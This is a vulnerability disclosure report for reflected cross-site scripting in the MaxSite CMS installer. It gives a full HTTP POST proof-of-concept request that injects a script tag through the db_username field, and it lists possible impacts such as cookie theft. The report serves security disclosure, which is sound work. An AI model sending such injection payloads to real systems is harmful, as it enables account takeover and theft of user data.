cms

vulnerability cross site scripting (xss)
severity 4.4
language php
registry other

✍️ Description

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data.

🕵️‍♂️ Proof of Concept

While setting up MaxSite CMS it requires us to fill up database info and db_username is being reflected on the page and if we put <script>alert(1)</script> in the db name field and submit the form to get the popup.
Here's the HTTP request:

POST /cms-1/install/ HTTP/1.1
Host: localhost
User-Agent: BadBoy17
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
Origin: http://localhost
Connection: close
Referer: http://localhost/cms-1/install/
Upgrade-Insecure-Requests: 1

username=hack&password=1234&email=hack%40hack.io&site_name=Pwn&db_hostname=localhost&db_username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&db_password=root&db_database=max&db_dbprefix=mso_

Screenshot

filename

💥 Impact

With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.

References